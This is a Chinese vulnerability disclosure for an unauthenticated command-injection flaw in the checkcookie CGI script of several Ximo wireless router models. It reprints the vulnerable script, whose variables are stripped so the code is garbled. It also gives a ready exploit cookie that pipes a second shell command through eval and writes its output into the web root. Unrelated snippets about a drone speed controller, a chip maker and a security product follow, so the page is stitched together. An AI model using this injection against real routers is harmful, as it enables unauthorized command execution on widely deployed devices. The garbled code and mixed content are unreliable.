西默科技智慧型無線路由裝置命令執行漏洞(無需登入)
該漏洞影響西默科技多個型號的無線路由,包括但不限於xmswr-w16、xmswr-w18m、xmswr-w15
使用量非常多,如圖:
該漏洞存在於如下檔案:
/cgi-bin/checkcookie
漏洞**為:
#!/bin/sh
printf "content-type:text/html;
cache-control:no-cache
"eval $(echo $);
if [ "$" = "login" ]; then
if [ "$" = "check" ]; then
exit 0
fiecho "
";else
#echo "
";echo "";
fihttp_cookie引數進入了eval函式,造成了漏洞
為了方便測試,只需要訪問:
/cgi-bin/checkcookie
加上cookie:login=login|ifconfig>/etc_ro/web/wy.txt
該系統大量使用,選取個別做漏洞證明
**.**.**.**/cgi-bin/checkcookie
成功執行後,即可在根目錄生成wy.txt
過濾
新西達無刷電調驅動方法
我這裡使用的新西達30a無刷電調。上電後會聽到電調發出一段 此後,會有一定頻率的嘀聲,代表電調正常,等待pwm訊號接入。這三根是連線板子的,紅正褐負,黃色訊號線接pwm輸出通道。紅色正極線 在測試的時候可以接,也可以不接,作用就是給板子供電,和讓飛控識別是有幾個旋翼接入。識別的方法就是adc測量電壓...
合肥炬晶元智慧型科技 深挖小蟻科技背後的智慧型晶元支援
隨著社會的發展,ai智慧型產品多到讓人目不暇接,產品的更新迭代速度也讓人嘆為觀止。以小蟻科技為例,自2014年9月發布第一款小蟻智慧型攝像機至今,產品已更新6代,從初代網紅款主打的紅外夜視功能,到如今的小蟻太空人人形偵測 移動追蹤等功能,智慧型化程度也在以肉眼可見的速度不斷公升級。產品智慧型化的水平...
默安科技發布國內首個欺騙防禦產品「幻盾」
10 月 26 日,新一代網路安全廠商默安科技在京舉行發布會。默安科技創始團隊集體亮相,向企業客戶 合作夥伴 發布了國內首個欺騙防禦類網路安全產品 幻盾,並展示了全新的企業威脅情報解決方案。網際網路巨頭坦誠不知何時會遭到攻擊 9月份,國際知名網際網路公司雅虎爆出遭黑客大規模入侵,包含使用者名稱 郵件...